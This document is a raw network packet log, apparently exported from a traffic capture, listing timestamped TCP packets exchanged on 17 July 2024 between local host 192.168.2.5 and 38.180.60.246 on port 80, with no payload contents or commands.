                                                                            Jul 17, 2024 15:19:58.874108076 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.874145031 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.874197960 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.874281883 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.874315977 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.874347925 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.874381065 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.874399900 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.874413967 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.874433994 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.874447107 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.874480009 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.874512911 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.874535084 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.874572039 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.874572992 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.914496899 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.960262060 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.960289001 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.960302114 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.960361004 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.960372925 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.960386038 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.960388899 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.960397959 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.960410118 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.960419893 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.960464001 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.961503029 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.961564064 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.961623907 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.961698055 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.961779118 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.961791039 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.961802006 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.961839914 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.961877108 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.961934090 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.961946011 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.961956024 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.961988926 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.962171078 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962183952 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962193966 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962223053 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.962260962 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.962289095 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962301970 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962311983 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962325096 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962337017 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962349892 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.962398052 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.962601900 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962615013 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962626934 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962637901 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962649107 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962652922 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.962719917 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.962861061 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962872982 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962883949 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962891102 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962903023 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962913990 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962923050 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.962948084 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.962984085 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.963391066 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.963402033 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.963407993 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.963418961 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.963433027 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.963445902 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.963458061 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.963462114 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.963469982 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.963481903 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.963489056 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.963493109 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.963505030 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.963516951 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.963521004 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.963529110 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.963551044 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.963576078 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.964044094 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964055061 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964063883 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964073896 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964083910 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964093924 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964099884 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964098930 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.964109898 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964122057 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964129925 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964142084 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964174032 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.964215040 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.964679003 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964689970 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964699030 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964709044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964720011 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964729071 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964734077 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.964739084 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964750051 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964760065 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964770079 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964781046 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.964792967 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.964834929 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.965344906 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.965356112 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.965364933 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.965373993 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.965384007 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.965394020 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.965404034 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.965409994 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.965423107 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.965435028 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.965437889 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.965445995 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.965461016 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.965471029 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.965472937 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.965482950 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.965495110 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.965533018 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.966073990 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.966084003 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.966094017 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.966104984 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.966114998 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.966126919 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.966126919 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.966139078 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.966149092 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.966159105 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.966169119 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.966173887 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.966180086 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.966190100 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.966198921 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.966201067 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.966212988 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.966223001 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.966228962 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.966278076 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.966278076 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.966289997 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.966973066 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.966984034 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.966994047 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.967004061 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.967015982 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.967026949 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.967037916 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.967048883 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.967051983 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.967060089 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.967071056 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.967080116 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:58.967102051 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.967102051 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.967108965 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:58.967148066 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.064480066 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.064522982 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.064532995 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.064624071 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.064688921 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.064698935 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.064708948 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.064721107 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.064759016 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.064802885 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.064892054 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.064902067 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.064910889 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.064949989 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.064963102 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.064970970 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.064971924 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.064981937 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.064991951 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.065002918 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.065011024 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.065022945 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.065062046 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.065536976 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.065546989 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.065556049 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.065565109 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.065573931 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.065583944 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.065593004 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.065598965 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.065603971 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.065613031 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.065618992 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.065622091 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.065630913 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.065643072 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.065653086 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.065673113 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.065701962 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.066288948 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.066298008 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.066307068 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.066317081 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.066327095 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.066335917 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.066344976 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.066344976 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.066354990 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.066364050 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.066375017 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.066385031 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.066392899 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.066395044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.066405058 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.066414118 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.066416979 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.066423893 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.066433907 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.066443920 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.066469908 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.066487074 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.067166090 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067176104 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067183971 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067193985 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067203045 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067214012 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067222118 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.067223072 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067233086 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067240953 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067250967 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067264080 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.067296982 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.067730904 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067742109 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067753077 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067764044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067773104 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067781925 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067781925 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.067791939 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067800999 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067811966 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067815065 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.067821026 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067831039 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067840099 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067845106 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.067848921 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067858934 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067863941 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.067867994 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067878008 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.067890882 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.067915916 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.068742990 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.068753004 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.068763018 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.068773031 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.068782091 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.068792105 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.068799973 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.068800926 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.068811893 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.068820953 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.068824053 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.068830967 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.068840981 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.068850994 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.068854094 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.068861008 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.068871975 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.068881035 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.068881035 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.068892956 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.068902016 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.068916082 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.068942070 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.069669008 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.069679976 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.069688082 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.069698095 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.069726944 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.069727898 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.069736004 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.069746017 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.069751024 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.069751978 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.069756031 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.069763899 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.069773912 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.069783926 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.069792986 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.069799900 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.069802999 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.069812059 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.069823980 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.069832087 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.069843054 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.069871902 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.070486069 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.070497036 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.070504904 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.070513964 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.070545912 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.070576906 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.147569895 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.147614956 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.147627115 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.147737980 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.147778988 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.147789955 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.147800922 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.147810936 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.147824049 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.147881031 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.147926092 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.147927046 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.147937059 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.147948027 CEST804970438.180.60.246192.168.2.5
